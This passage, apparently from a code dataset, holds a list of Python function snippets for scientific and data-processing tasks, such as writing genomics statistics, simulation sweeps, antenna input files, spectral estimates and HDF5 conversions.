exon_data[gene]:\n data.extend(range(exon[0], exon[1] + 1))\n o.write('{0}\\t{1}\\t{2}\\n'.format(gene, gtype, len(set(data))))", "def main():\n\n\t# eesAmplitudes = range(200,321,10)\n\teesAmplitudes = [\"%\"+\"%.2f_0_0\"%(i) for i in np.arange(0,1.01,.05)]\n\t# eesFrequencies = range(10,1001,20)\n\teesFrequencies = np.logspace(1,3,50)\n\t# nrnStructureFile = \"fsSFrFfMnArtMod.txt\"\n\t# nrnStructureFile = \"fsSFrFfMnArtModHuman.txt\"\n\tnrnStructureFile = \"fsMnArtModHuman.txt\"\n\t# name = \"FreqAmpModHuman_0367S\"\n\tname = \"FreqAmpModHuman_ArtmodHuman_10msBurst\"\n\n\tnSim = len(eesFrequencies)*len(eesAmplitudes)\n\tcount=0.\n\tpercLastPrint=0.\n\tprintPeriod = 0.05\n\t# simTime = 250\n\tsimTime = 15\n\tspecies = \"human\"\n\n\tfor eesAmplitude in eesAmplitudes:\n\t\tfor eesFrequency in eesFrequencies:\n\t\t\tfilName = name+\"_amp_\"+str(eesAmplitude)+\"_freq_\"+str(eesFrequency)\n\t\t\tresultFile = gt.find(\"*\"+filName+\".p\",pathToResults)\n\t\t\tif not resultFile:\n\t\t\t\treturnCode = None\n\t\t\t\twhile not returnCode==0:\n\t\t\t\t\tprogram = ['python','scripts/computeAfferentsEfferentsModulation.py',\n\t\t\t\t\t\tstr(eesFrequency),str(eesAmplitude),species,nrnStructureFile,name,\"--simTime\",str(simTime)]\n\t\t\t\t\tprint \" \".join(program)\n\t\t\t\t\tforwardSimulation = subprocess.Popen(program, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\t\t\t\t\treturnCode = None\n\t\t\t\t\twhile returnCode is None:\n\t\t\t\t\t\tmessage = forwardSimulation.stdout.readline().rstrip(\"\\n\").split()\n\t\t\t\t\t\tif message != None:print \"\\t\\t\"+\" \".join(message)+\"\\t\\t\"\n\t\t\t\t\t\treturnCode = forwardSimulation.poll()\n\t\t\t\t\tif returnCode != 0: print \"\\t\\t\\t\\t Error n: \",forwardSimulation.poll(),\" resetting simulation...\"\n\t\t\tcount+=1\n\t\t\tif count/nSim-percLastPrint>=printPeriod:\n\t\t\t\tpercLastPrint=count/nSim\n\t\t\t\tprint str(round(count/nSim*100))+\"% of simulations performed...\"\n\tplot_stats(eesAmplitudes,eesFrequencies,simTime,name)", "def estimate_num_spill_files(num_words, key_num_bytes, value_num_bytes, mapreduce_task_io_sort_mb, mapreduce_map_sort_spill_percent):\n # extra bytes added when each (k,v) pair is added to output buffer\n KEY_VALUE_META_DATA_NUM_BYTES = 16\n\n key_len_num_bytes = zero_compress.size_of_zero_compressed_int64(key_num_bytes)\n value_len_num_bytes = zero_compress.size_of_zero_compressed_int64(value_num_bytes)\n\n return math.ceil((num_words * (KEY_VALUE_META_DATA_NUM_BYTES + key_len_num_bytes + key_num_bytes + value_len_num_bytes + value_num_bytes)) /\n (util.MiB_to_bytes(mapreduce_task_io_sort_mb) * mapreduce_map_sort_spill_percent))", "def _create_sparsed_file(self, nms, path, size):\n nms.appliance.execute(\n 'truncate --size %(size)dG %(path)s' % {\n 'path': path,\n 'size': size\n }\n )", "def store_regain_values(filename,gain_vals,gain_comment=\"\"):\n f = open(filename,\"w\")\n f.write(\"#Gain values calculated by Echidna reduction routine\\n\")\n f.write(\"#\"+gain_comment+\"\\n\")\n for pos,gain in zip(range(len(gain_vals)),gain_vals):\n f.write(\"%d %8.3f\\n\" % (pos,gain))\n f.close()", "def create_binning_file(bin_size,n_bins,lmax=None, file_name=None):\n bins = np.arange(n_bins)\n bin_low = bins * bin_size + 2\n bin_hi = (bins + 1) * bin_size + 1\n bin_cent = (bin_low + bin_hi) / 2\n \n if lmax is not None:\n id = np.where(bin_hi <lmax)\n bin_lo,bin_hi,bin_c=bin_lo[id],bin_hi[id],bin_c[id]\n\n if file_name is None:\n return bin_low, bin_hi, bin_cent\n else:\n f = open('%s'%file_name,mode=\"w\")\n for i in range(n_bins):\n f.write(\"%0.2f %0.2f %0.2f\\n\"%(bin_low[i],bin_hi[i],bin_cent[i]))\n f.close()", "def write_input_file(y,z,fname):\n file = open('c:/4nec2/out/' + fname + '.nec', 'w')\n file.write('CM Seeddesign \\n')\n file.write('CM Zigzag Antenna \\n')\n file.write('CE File generated by python \\n')\n seg = 1\n\n #write the antenna\n for i in range(0,len(y)-1):\n file.write('GW %3i %3i %8.4f %8.4f %8.4f %8.4f %8.4f %8.4f %8.4f\\n' % (1,seg,0,y[i],z[i],0,y[i+1],z[i+1],1))\n\n file.write('GE 0 \\n')\n file.write('EK \\n')\n file.write('EX %3i %3i %3i %3i %3i %3i %3i\\n' % (0,1,1,1,1,0,0))\n file.write('GN -1 \\n')\n \n file.write('FR %3i %3i %3i %3i %8.4f %8.4f\\n' % (0,1,0,0,900,0))\n file.write('FR %3i %3i %3i %3i %8.4f %8.4f\\n' % (0,11,0,0,850,10))\n\n file.write('LD %3i %3i %3i %3i %8.4f %8.4f\\n' % (5,1,0,0,58000000,2))\n file.write('RP %3i %3i %3i %3i %8.4f %8.4f %8.4f %8.4f\\n' % (0,1,1,1000,90,0,0,0))\n\n file.write('EN \\n')\n file.close()", "def exp_calculator_with_count(count_table_file):\n count_table = pd.read_table(count_table_file, index_col=0)\n columns = count_table.columns\n\n gene_len = count_table[columns[0]]\n rpkm_dict = dict()\n tpm_dict = dict()\n for sample in columns[1:]:\n # Divide the read counts by the length of each gene in kilobases.\n # This gives you reads per kilobase (RPK)\n rpk = count_table[sample]/gene_len\n # get rpkm/fpkm\n total_counts = sum(count_table[sample])/1000\n \"\"\"\n rpkm = (count_table[sample]/gene_len)/(sum(count_table[sample])/1000)*1000000\n \"\"\"\n rpkm = rpk/total_counts*1000000\n # get tpm\n norm_gene_len_total_counts = sum(rpk)\n tpm = rpk/norm_gene_len_total_counts*1000000\n \"\"\"\n tpm = (count_table[sample]/gene_len)/sum(count_table[sample]/gene_len)*1000000\n \"\"\"\n # save\n rpkm_dict[sample] = rpkm\n tpm_dict[sample] = tpm\n # save results\n df_rpkm = pd.DataFrame(rpkm_dict, index=count_table.index)\n df_tpm = pd.DataFrame(tpm_dict, index=count_table.index)\n df_rpkm.to_csv(count_table_file+'.fpkm.xls', sep='\\t')\n df_tpm.to_csv(count_table_file+'.tpm.xls', sep='\\t')\n #\n return rpkm_dict, tpm_dict", "def main(input_filepath, output_filepath):\n productsDict = dataToDict(input_filepath)\n productsList = dictToCSV(productsDict)\n toCSV(productsList, output_filepath)\n\n logger = logging.getLogger(__name__)\n logger.info('making final data set from raw data')", "def file_write(t,percent): \r\n \r\n file_name = \"EP305data56.txt\"\r\n \r\n # Open a file for writing\r\n out_file = open(file_name, 'w')\r\n \r\n # print headers\r\n print('{0:<10}'.format('Time(s)'),\\\r\n '{0:<10}'.format('Output (%)'), file = out_file)\r\n \r\n # Write the values to the file\r\n #(fixed decimal point notation with 5 decimal places)\r\n for i in range (len(percent)):\r\n print('{0:<10.5f}'.format(t[i]),\\\r\n '{0:<10.5f}'.format(percent[i]), file = out_file)\r\n \r\n # Close the file\r\n out_file.close()", "def fog_file_writer(data, location, count):\n\n data.to_csv(location.format(str(count % 2000) + '.txt'))\n count += 1\n\n return count", "def whriteInOuput(finalOutput):\n\n os.chdir(\"D:/IIHT/Python/Project/NRPT all companies scrapper/caches\")\n #open text file, return an object of type io.TextIOWrapper\n with open(\"Companies Website.txt\", \"w\") as writ:\n #write each line in the object op, return an object of type int\n writ.write('\\n'.join(finalOutput) + \"\\n\")", "def create_export_files(n,input_choice,timing,min_hull_per):\n\n\n\texists = os.path.isdir('analysis')\n\tif exists:\n\t\tf = open('analysis/results.csv','a',newline='')\n\t\tresults = csv.writer(f)\n\telse:\n\t\tos.mkdir('analysis')\n\t\tf = open('analysis/results.csv','w',newline='')\n\t\tresults = csv.writer(f)\n\t\tresults.writerow(['Algo','Size of Input','Min. Hull Pts Per','Type of Input','Timing'])\n\n\n\tresults.writerow(['Graham Scan',n,min_hull_per,input_choice,timing])", "def create_files(tweets_input, ft1_output, ft2_output):\n # create all possible words for input file\n all_words = word_generator()\n\n word_counts = defaultdict(int)\n median_counter = Counter({k: 0 for k in range(1, MAX_LINE_SIZE + 1)})\n\n with open(tweets_input, 'w') as tweets_file:\n with open(ft2_output, 'w') as medians_file:\n for n_lines in range(1, NUM_LINES + 1):\n\n # add a tweet line to input/test file\n line_size = random.randint(MIN_LINE_SIZE, MAX_LINE_SIZE)\n words = [random.choice(all_words) for _ in range(line_size)]\n tweet = ' '.join(words)\n tweets_file.write(tweet + \"\\n\")\n\n # Feature 1 testing: Keep a count of words added to test file\n for word in words:\n word_counts[word] += 1\n\n # Feature 2 testing: compute new median via histogram method and write to file\n median_counter[len(set(words))] += 1\n medians_file.write('{0:.1f}\\n'.format(get_median(median_counter, n_lines)))\n\n # Feature 1: write word counts to file\n with open(ft1_output, 'w') as word_counts_file:\n for word, count in sorted(word_counts.items(), key=operator.itemgetter(0)):\n word_counts_file.write('{0} {1}\\n'.format(word.ljust(WORD_SIZE), str(count)))", "def output(results):\n\n text_file = open(\"problem_1_B_output.txt\", \"w\")\n\n out = \"\"\n\n for i, line in enumerate(results):\n\n string = \"Sample {}: {}, posterior probability of {:.4f}\".format(i + 1,\n line[0],\n line[1])\n\n out += (string + \"\\n\")\n\n text_file.write(out)\n\n text_file.close()", "def postprocess_cga(lines, outfile):\n pattern = re.compile(\"^\\s*([0-9,]+)\\s+\\([ 0-9.]+%\\)\\s+Source/(\\S+):(\\S+)\\(.*\\).*$\")\n\n totalCost = 0.0\n functionTable = []\n functionMap = {}\n\n for line in lines:\n line = line.strip()\n match = pattern.match(line)\n if not match:\n continue\n\n cost = float(match.group(1).replace(\",\", \"\"))\n sourceFile = match.group(2)\n function = match.group(3)\n\n # Filter out library code we don't want to change\n if function.startswith(\"stbi__\"):\n continue\n\n totalCost += cost\n\n # Accumulate the scores from functions in multiple call chains\n if function in functionMap:\n index = functionMap[function]\n functionTable[index][1] += cost\n functionTable[index][2] += cost\n # Else add new functions to the end of the table\n else:\n functionMap[function] = len(functionTable)\n functionTable.append([function, cost, cost])\n\n # Sort the table by accumulated cost\n functionTable.sort(key=lambda x: 101.0 - x[2])\n\n for function in functionTable:\n function[2] /= totalCost\n function[2] *= 100.0\n\n with open(outfile, \"w\") as fileHandle:\n\n totals = 0.0\n for function in functionTable:\n # Omit entries less than 1% load\n if function[2] < 1:\n break\n\n totals += function[2]\n fileHandle.write(\"%5.2f%% %s\\n\" % (function[2], function[0]))\n\n fileHandle.write(\"======\\n\")\n fileHandle.write(f\"{totals:5.2f}%\\n\")", "def test_generate_histogram(self):\r\n\r\n # Cannot test content of graphics file, only successful execution\r\n\r\n output_dir = self.output_dir\r\n\r\n # Should not raise an error with good data\r\n generate_histogram(self.qual_fp, output_dir, verbose=False)\r\n\r\n expected_outfile = output_dir + 'quality_scores_plot.pdf'\r\n\r\n self.assertTrue(isfile(expected_outfile))\r\n\r\n # Test text file output for proper data\r\n text_output_fp = output_dir + \"quality_bins.txt\"\r\n\r\n text_output_f = open(text_output_fp, \"U\")\r\n\r\n actual_text_output = \"\\n\".join([line.strip()\r\n for line in text_output_f])\r\n\r\n self.assertEqual(actual_text_output, self.expected_output_text_file)", "def build_input_file(self, replica):\n\n file_name = self.inp_basename + \"_\" + \\\n str(replica.id) + \"_\" + \\\n str(replica.cycle) + \".md\"\n\n fo = open(file_name, \"wb\")\n for i in range(1,500):\n fo.write(str(random.randint(i, 500) + i*2.5) + \" \");\n if i % 10 == 0:\n fo.write(str(\"\\n\"));\n fo.close()", "def limit(filename,threshold,makeup,wout=True,plot=False):\n start=time.time()\n n, data, data_dB,sr,ch=inputwav(filename)\n dataL,dataL_bit=compress(filename,threshold,1000.0,makeup,1.0,500.0,wout=False,plot=plot)\n if wout==True:\n print('Exporting...')\n sf.write(filename[0:len(filename)-4]+'_limit.wav',dataL_bit,44100,'PCM_16')\n end=time.time()\n elapsed=int(1000*(end-start))\n print('Done!')\n print('...............................')\n print('Completed in '+str(elapsed)+' milliseconds.') \n return dataL,dataL_bit", "def generatePhasingScore(options,phase,cycle):\n score,readcount,readseq=readDataForPhasingScoreComputation(options,phase)\n phased_loci_filename=options.output_directory_per_run+\"/\"+options.input_filename+\"_\"+str(phase)+\"_\"+str(cycle)+\".positive_phase_loci\"\n final_phase_loci=options.output_directory_per_run+\"/\"+options.input_filename+\"_\"+str(phase)+\"_\"+str(cycle)+\".phasing_score_phase_loci\"\n fhr=open(phased_loci_filename,\"r\")\n out4=open(final_phase_loci,\"w\")\n for line in fhr:\n chromosome,ss,ee=line.strip().split()\n ss=int(ss)\n ee=int(ee)\n #correct=list(range(ss,ee+1,phase))\n phasing_score_filename=options.output_directory_per_run+\"/\"+str(phase)+\"_\"+str(chromosome)+\"_\"+str(ss)+\"_\"+str(ee)+\".phasing_score\"\n abundance_score_filename=options.output_directory_per_run+\"/\"+str(phase)+\"_\"+str(chromosome)+\"_\"+str(ss)+\"_\"+str(ee)+\".abundance\"\n out=open(phasing_score_filename,\"w\")\n out2=open(abundance_score_filename,\"w\")\n score_count={}\n for site in range(ss,ee+1):\n start=site-(phase*4)\n end=site+(phase*5)-1\n max_within_site,max_within_count,all_scores=0,0,0\n for cor in range(start,end+1):\n if cor not in score[chromosome]:continue\n all_scores+=score[chromosome][cor]\n for i in readcount[chromosome][cor]:\n if max_within_count<readcount[chromosome][cor][i]:\n max_within_site=cor\n max_within_count=readcount[chromosome][cor][i]\n all_scores-=max_within_count\n P,k=0,0\n s=start\n while s<end:\n if s not in score[chromosome]:\n s+=phase\n continue\n if score[chromosome][s]!=0:\n P+=score[chromosome][s]\n k+=1\n if s == max_within_site:\n P-=max_within_count \n s+=phase\n U=all_scores-P\n \n #if U<0: continue\n if k>=3:\n #print(P,U,k)\n phas_score=math.log((1+(10*(P/(1+U))))**(k-2))\n \"\"\"if phas_score>max and site in correct:\n max=phas_score\"\"\"\n else:\n phas_score=0\n out.write(str(site)+\"\\t\"+str(phas_score)+\"\\n\")\n out4.write(chromosome+\"\\t\"+str(site)+\"\\t\"+str(phas_score)+\"\\n\")\n if chromosome not in score_count:\n score_count[chromosome]={}\n if site not in score_count[chromosome]:\n score_count[chromosome][site]=phas_score\n if site in readcount[chromosome] and '+' in readcount[chromosome][site] and readcount[chromosome][site]['+']!=0:\n out2.write(str(site)+\"\\t\"+str(readcount[chromosome][site]['+'])+\"\\n\")\n if site in readcount[chromosome] and '-' in readcount[chromosome][site] and readcount[chromosome][site]['-']!=0:\n out2.write(str(site)+\"\\t-\"+str(readcount[chromosome][site]['-'])+\"\\n\")\n out.close()\n out2.close()\n \n #out4.write(chromosome+\"\\t\"+str(ss)+\"\\t\"+str(ee)+\"\\t\"+str(phas_score)+\"\\n\")\n out4.close()", "def reduce_and_save():\n ### Get the signature information\n sig_info = pd.read_csv(join(FILE_PATH, \"GSE92742_Broad_LINCS_sig_info.txt\"), sep=\"\\t\")\n ### Columns are:\n ### Index([u'sig_id', u'pert_id', u'pert_iname', u'pert_type', u'cell_id',\n ### u'pert_dose', u'pert_dose_unit', u'pert_idose', u'pert_time',\n ### u'pert_time_unit', u'pert_itime', u'distil_id'],\n ### dtype='object')\n\n ### Filter for signature ids for small molecule pertubagens\n small_mol_sigs = sig_info['sig_id'][sig_info['pert_type'] == \"trt_cp\"]\n ### Results in 205034 signatures\n\n ### Read in the gene info\n gene_info = pd.read_csv(join(FILE_PATH, \"GSE92742_Broad_LINCS_gene_info.txt\"), sep='\\t')\n ### Index([u'pr_gene_id', u'pr_gene_symbol', u'pr_gene_title', u'pr_is_lm',\n ### u'pr_is_bing'],\n ### dtype='object')\n\n landmark_gene_ids = gene_info['pr_gene_id'][gene_info['pr_is_lm'] == 1] #Filters for directly measured transcripts\n ### Results in the 978 landmark pr_gene_ids\n\n ### LOAD in the main file filtering the columns so that only the small molecules signatures are loaded and the\n ### rows such that only the landmark genes are loaded into their custom gctoo container type\n relevent_sigs_gctoo = parse(join(FILE_PATH, \"GSE92742_Broad_LINCS_Level5_COMPZ.MODZ_n473647x12328.gctx\"),\n cid=small_mol_sigs, rid=landmark_gene_ids)\n # print small_mol_sigs.data_df.shape\n ### Should write an intermediate file with dimensions (978, 205034)\n write_gctx.write(relevent_sigs_gctoo, join(FILE_PATH, \"lm_sm_aggz\"))", "def gen_fps():\n global data_src ,output_dir \n logger = TaskFileLogger(\"GenFP\")\n\n h_vars = load_hydro_var()\n if not os.path.exists(output_dir):\n os.mkdir(output_dir)\n\n for h_type,var_d in h_vars.items():\n print \"considering %s\" %h_type\n\n t_output_dir = os.path.join(output_dir,h_type)\n if not os.path.exists(t_output_dir):\n print \"creating path %s\" %t_output_dir\n os.mkdir(t_output_dir)\n logger.log(\"%s started\" %(h_type))\n\n for fname in glob.glob(data_src):\n complex_id = os.path.basename(fname).split('.')[0] \n fp_path = os.path.join(t_output_dir,complex_id + \".fp\" )\n if os.path.exists(fp_path):\n #print \"%s processed\" %complex_id\n continue\n print \"processing %s,fp saved as %s\" %(fname , fp_path )\n c = Complex(fname,hydro_dict = var_d)\n c.get_fp()\n c.write_fp_to_file(fp_path)\n\n logger.log(\"%s finished\" %(h_type))", "def output_mb(self):\n total_output_size = sum([t.shuffle_mb_written for t in self.tasks])\n return total_output_size", "def processfile(file, out, me):\n if out.endswith('.npz'):\n out = out[:-4]\n out = out + ('-%03d' % me) + '.npz'\n if os.path.exists(out):\n return\n f = QPM.QPMSubsampleFile(file)\n xis = []\n mybf = QPM.LogWindowBiasFunction(edges[me], edges[me + 1])\n mymock = QPM.halomock(f, 1e6, mybf, continuous=False)\n for i in range(me + 1):\n bf = QPM.LogWindowBiasFunction(edges[i], edges[i + 1])\n mock = QPM.halomock(f, 1e6, bf, continuous=False)\n # the error is nonsense since we have just one sample\n # deal with it in combine\n xi = QPM.xi([mock], mocks2=[mymock])\n r = xi[0]\n xis.append(xi[1])\n print edges[i], edges[i + 1], len(mock[0]), mock[1].sum()\n numpy.savez(out, r=r, xi=xis, edges=edges, N=1e6, me=me)", "def createOutput():\n\n firstPeriod = True\n # get edge No\n edgesNo = 0\n edgesSet = set()\n for timestep, taxiList in vtypeDict.iteritems():\n for tup in taxiList:\n edgesSet.add(tup[1])\n edgesNo = len(edgesSet)\n\n outputFile = open(path.FQoutput, 'w')\n outputFile.write('<?xml version=\"1.0\"?>\\n')\n outputFile.write('<paramEffects aggregationInterval=\"%d\" vehicles=\"%d\" edges=\"%d\">\\n' % (\n aggInterval, vehSum, edgesNo))\n for period, quota, vtypeDictR, taxiSum in generatePeriodQuotaSets(True):\n if quota is None:\n if not firstPeriod:\n outputFile.write(\"\\t</periods>\\n\")\n else:\n firstPeriod = False\n outputFile.write('\\t<periods period=\"%d\">\\n' % (period))\n else:\n simpleTaxiMeanVList = [0, 1]\n simpleEdgeMeanVList = [0, 1]\n drivenEdgesSet = set()\n\n if len(vtypeDictR) == 0: # if the processed FCD returns no Values\n print(\"noData p\", period, \" q\", quota)\n drivenEdgesSet.add(0)\n else: # create mean from all taxi speed values\n for timestep, taxiList in vtypeDictR.iteritems():\n for tup in taxiList: # all elements in this timestep\n simpleTaxiMeanVList[0] += tup[2]\n simpleTaxiMeanVList[1] += 1\n drivenEdgesSet.add(tup[1])\n # create mean from all edge speed values which are driven by the\n # chosen taxis\n drivenEdgesList = list(drivenEdgesSet)\n drivenEdgesList.sort()\n # print \"dataSets \",simpleTaxiMeanVList[1]\n\n # --edgeDump-- #\n \"\"\"\n for i in edgeDumpDict.keys(): #all intervals\n for edge,v in edgeDumpDict[i]:\n if BinarySearch.isElmInList(drivenEdgesList,edge):\n simpleEdgeMeanVList[0]+=v\n simpleEdgeMeanVList[1]+=1\n \"\"\"\n # --vtype-- #\n\n for timestep, taxiList in vtypeDict.iteritems():\n for tup in taxiList:\n if BinarySearch.isElmInList(drivenEdgesList, tup[1]):\n simpleEdgeMeanVList[0] += tup[2]\n simpleEdgeMeanVList[1] += 1\n\n # calc values for output\n detectedEdges = len(drivenEdgesSet)\n relDetectedEdges = detectedEdges * 100.0 / edgesNo\n vSim = simpleEdgeMeanVList[0] / simpleEdgeMeanVList[1]\n vSimFCD = simpleTaxiMeanVList[0] / simpleTaxiMeanVList[1]\n vAbsDiff = vSimFCD - vSim\n if vSim != 0:\n vRelDiff = vAbsDiff / vSim * 100\n else:\n vRelDiff = 100\n if vRelDiff < -40:\n vRelDiff = -35\n\n outputFile.write('\\t\\t<values taxiQuota=\"%f\" taxis=\"%d\" simMeanSpeed=\"%f\" simFcdMeanSpeed=\"%f\" ' % (\n quota, taxiSum, vSim, vSimFCD,))\n outputFile.write('detectedEdges=\"%d\" notDetectedEdges=\"%d\" ' % (\n detectedEdges, edgesNo - detectedEdges))\n outputFile.write('absSpeedDiff=\"%f\" relSpeedDiff=\"%f\" relDetectedEdges=\"%f\" relNotDetectedEdges=\"%f\"/>\\n' %\n (vAbsDiff, vRelDiff, relDetectedEdges, 100 - relDetectedEdges))\n outputFile.write(\"\\t</periods>\\n</paramEffects>\")\n outputFile.close()", "def run_reduce(self):\n from histogram import add_and_save\n root_file = TFile(self.args.output, \"RECREATE\")\n add_and_save(self.output, root_file)\n root_file.Write()\n root_file.Close()", "def log_file1D(fast5_data , basecall_stat):\n\n version, flowcell_id, hostname, numMinion, run_id = fast5_data\n\n #Retrieve the dataframe with statitstics such as the quartile or std\n #Retrieve the dictionary from albacore summary log\n\n num_called_template, mean_qscore_template = basecall_stat.stat_generation()\n\n counter_template, total_nucleotide_template = basecall_stat.counter()\n\n occupancy_pore = basecall_stat.occupancy_pore()\n\n completeName = os.path.join('/home/ferrato/Documents/fast5', \"fichier_aozan.txt\")\n\n with open(completeName, 'w') as file_data:\n\n for index, element in num_called_template.iteritems():\n file_data.write(\"num.called.template.{}={}\\n\".format(index, element))\n\n for index, element in num_called_template.iteritems():\n file_data.write(\"mean.qscore.template.{}={}\\n\".format(index, element))\n\n for nucleotide, count in counter_template.items():\n file_data.write(\"nucleotide.{}.template={}\\n\".format(nucleotide,count))\n if nucleotide == 'total':\n continue\n calcul = float(count) / float(total_nucleotide_template)\n file_data.write(\"nucleotide.{}.proportion={}\\n\".format(nucleotide, calcul))\n\n\n file_data.write(\"total.number.of.sequence={}\\n\".format(basecall_stat.fast5_tot))\n\n for index, value in occupancy_pore.items():\n file_data.write(\"pore.occupancy.{}={}\\n\".format(index, value))\n\n\n file_data.write(\"flowcell.serial.number={}\\n\".format(flowcell_id))\n file_data.write(\"minknown.version={}\\n\".format(version))\n file_data.write(\"hostname={}\\n\".format(hostname))\n file_data.write(\"minion.serial.number={}\\n\".format(numMinion))\n file_data.write((\"run.id={}\\n\".format(run_id)))\n\n for index, element in basecall_stat.statistics_read_size().iteritems():\n file_data.write(\"Read.fastq.length.{}={}\\n\".format(index, element))", "def constructReadCountsStr(samplesList, resultsPath, outRoot, stype):\n files = []\n for i in range(len(samplesList)):\n files.append(os.path.join(resultsPath, outRoot) + \".\" + stype + \".\" + str(i) + \".pruned.te-counts.txt\")\n return \",\".join(files)", "def psd_estimate(src_file, type):\n\n #Open file\n with NWBHDF5IO(src_file, mode='r+', load_namespaces=True) as io:\n nwb = io.read()\n\n #Source ElectricalSeries\n if type=='raw':\n data_obj = nwb.acquisition['ElectricalSeries']\n elif type=='preprocessed':\n data_obj = nwb.processing['ecephys'].data_interfaces['LFP'].electrical_series['preprocessed']\n\n nChannels = data_obj.data.shape[1]\n nSamples = data_obj.data.shape[0]\n fs = data_obj.rate\n #Welch - window length as power of 2 and keeps dF~0.05 Hz\n dF = .05 #Frequency bin size\n win_len_welch = 2**(np.ceil(np.log2(fs/dF)).astype('int')) #dF = fs/nfft\n #FFT - using a power of 2 number of samples improves performance\n nfft = int(2**(np.floor(np.log2(nSamples)).astype('int')))\n fx_lim = 200.\n for ch in np.arange(nChannels): # Iterate over channels\n trace = data_obj.data[:, ch]\n fx_w, py_w = sgn.welch(trace, fs=fs, nperseg=win_len_welch)\n fx_f, py_f = sgn.periodogram(trace, fs=fs, nfft=nfft)\n #saves PSD up to 200 Hz\n py_w = py_w[fx_w < fx_lim]\n fx_w = fx_w[fx_w < fx_lim]\n py_f = py_f[fx_f < fx_lim]\n fx_f = fx_f[fx_f < fx_lim]\n if ch==0:\n PY_welch = py_w.reshape(-1,1)\n PY_fft = py_f.reshape(-1,1)\n else:\n PY_welch = np.append(PY_welch, py_w.reshape(-1,1), axis=1)\n PY_fft = np.append(PY_fft, py_f.reshape(-1,1), axis=1)\n\n #Electrodes\n elecs_region = nwb.electrodes.create_region(name='electrodes',\n region=np.arange(nChannels).tolist(),\n description='all electrodes')\n\n #PSD shape: ('frequency', 'channel')\n spectrum_module_welch = Spectrum(name='Spectrum_welch_'+type,\n frequencies=fx_w,\n power=PY_welch,\n source_timeseries=data_obj,\n electrodes=elecs_region)\n\n spectrum_module_fft = Spectrum(name='Spectrum_fft_'+type,\n frequencies=fx_f,\n power=PY_fft,\n source_timeseries=data_obj,\n electrodes=elecs_region)\n \n # Processing module\n try: # if ecephys module already exists\n ecephys_module = nwb.processing['ecephys']\n except: # creates ecephys ProcessingModule\n ecephys_module = ProcessingModule(name='ecephys',\n description='Extracellular electrophysiology data.')\n # Add module to NWB file\n nwb.add_processing_module(ecephys_module)\n print('Created ecephys')\n ecephys_module.add_data_interface(spectrum_module_welch)\n ecephys_module.add_data_interface(spectrum_module_fft)\n\n io.write(nwb)\n print('Spectrum_welch_'+type+' added to file.')\n print('Spectrum_fft_'+type+' added to file.')", "def convert_calculations(filename, hdf5_data):\n x1 = []\n\n with open(filename, 'r') as inp:\n for line in inp:\n x1.append(line)\n\n idx = 1\n dset = require_dataset(hdf5_data, structure.H5_ENV_VOLUME, (1,), dtype=settings.NEMOH_FLOAT)\n dset[0] = float(x1[idx].split()[0])\n set_hdf5_attributes(dset, structure.H5_ENV_VOLUME_ATTR)\n idx += 1\n\n dset = require_dataset(hdf5_data, structure.H5_ENV_GRAVITY, (1,), dtype=settings.NEMOH_FLOAT)\n dset[0] = float(x1[idx].split()[0])\n set_hdf5_attributes(dset, structure.H5_ENV_GRAVITY_ATTR)\n idx += 1\n\n\n dset = require_dataset(hdf5_data, structure.H5_ENV_DEPTH, (1,), dtype=settings.NEMOH_FLOAT)\n dset[0] = float(x1[idx].split()[0])\n set_hdf5_attributes(dset, structure.H5_ENV_DEPTH_ATTR)\n idx += 1\n\n dset = require_dataset(hdf5_data, structure.H5_ENV_WAVE_POINT, (2,), dtype=settings.NEMOH_FLOAT)\n x2 = x1[idx].split()\n dset[0] = float(x2[0])\n dset[1] = float(x2[1])\n set_hdf5_attributes(dset, structure.H5_ENV_WAVE_POINT_ATTR)\n\n idx = 6\n\n num_bodies = int(x1[idx].split()[0])\n\n for i in range(num_bodies):\n\n body = structure.H5_BODIES + structure.H5_BODY_BASE + str(i+1) + '/'\n idx += 2\n\n mesh_x = []\n\n mesh_path = os.path.join(os.path.abspath(os.path.dirname(filename)), str(x1[idx].split()[0]).strip(' \\t\\n\\r'))\n\n with open(mesh_path, 'r') as mesh_file:\n for line in mesh_file:\n mesh_x.append(line)\n\n idx += 1\n x2 = x1[idx].split()\n\n num_points = int(x2[0])\n num_panels = int(x2[1])\n dset = require_dataset(hdf5_data, body + structure.H5_BODY_NUM_POINTS, (1, ), dtype=settings.NEMOH_INT)\n dset[0] = num_points\n set_hdf5_attributes(dset, structure.H5_BODY_NUM_POINTS_ATTR)\n\n dset = require_dataset(hdf5_data, body + structure.H5_BODY_NUM_PANELS, (1, ), dtype=settings.NEMOH_INT)\n dset[0] = num_panels\n set_hdf5_attributes(dset, structure.H5_BODY_NUM_PANELS_ATTR)\n\n mesh_idx = 0\n dset = require_dataset(hdf5_data, body + structure.H5_BODY_MESH, (num_points+num_panels+1, 4), dtype=settings.NEMOH_FLOAT)\n mesh_x2 = mesh_x[mesh_idx].split()\n set_hdf5_attributes(dset, structure.H5_BODY_MESH_ATTR)\n\n dset[0, 0] = int(mesh_x2[0])\n dset[0, 1] = int(mesh_x2[1])\n\n for j in range(1, num_points+num_panels+1):\n mesh_idx += 1\n mesh_x2 = mesh_x[mesh_idx].split()\n dset[j, :] = [float(x) for x in mesh_x2[:4]]\n\n if j == num_points:\n mesh_idx += 1\n\n idx += 1\n num = int(x1[idx].split()[0])\n dset = require_dataset(hdf5_data, body + structure.H5_FREEDOM_DEGREE, (num, 7), dtype=settings.NEMOH_FLOAT)\n set_hdf5_attributes(dset, structure.H5_FREEDOM_DEGREE_ATTR)\n for j in range(num):\n idx += 1\n x2 = x1[idx].split()\n dset[j, :] = np.array([float(x) for x in x2[:7]])\n\n idx += 1\n num = int(x1[idx].split()[0])\n dset = require_dataset(hdf5_data, body + structure.H5_GENERALISED_FORCES, (num, 7), dtype=settings.NEMOH_FLOAT)\n set_hdf5_attributes(dset, structure.H5_GENERALISED_FORCES_ATTR)\n for j in range(num):\n idx += 1\n x2 = x1[idx].split()\n dset[j, :] = [float(x) for x in x2[:7]]\n\n idx += 1\n num = int(x1[idx].split()[0])\n for j in range(num):\n idx += 1\n\n idx += 2\n x2 = x1[idx].split()\n\n dset = require_dataset(hdf5_data, structure.H5_NUM_WAVE_FREQUENCIES, (1,), dtype=settings.NEMOH_INT)\n set_hdf5_attributes(dset, structure.H5_NUM_WAVE_FREQUENCIES_ATTR)\n dset[0] = int(x2[0])\n dset = require_dataset(hdf5_data, structure.H5_MIN_WAVE_FREQUENCIES, (1,), dtype=settings.NEMOH_FLOAT)\n set_hdf5_attributes(dset, structure.H5_MIN_WAVE_FREQUENCIES_ATTR)\n dset[0] = float(x2[1])\n dset = 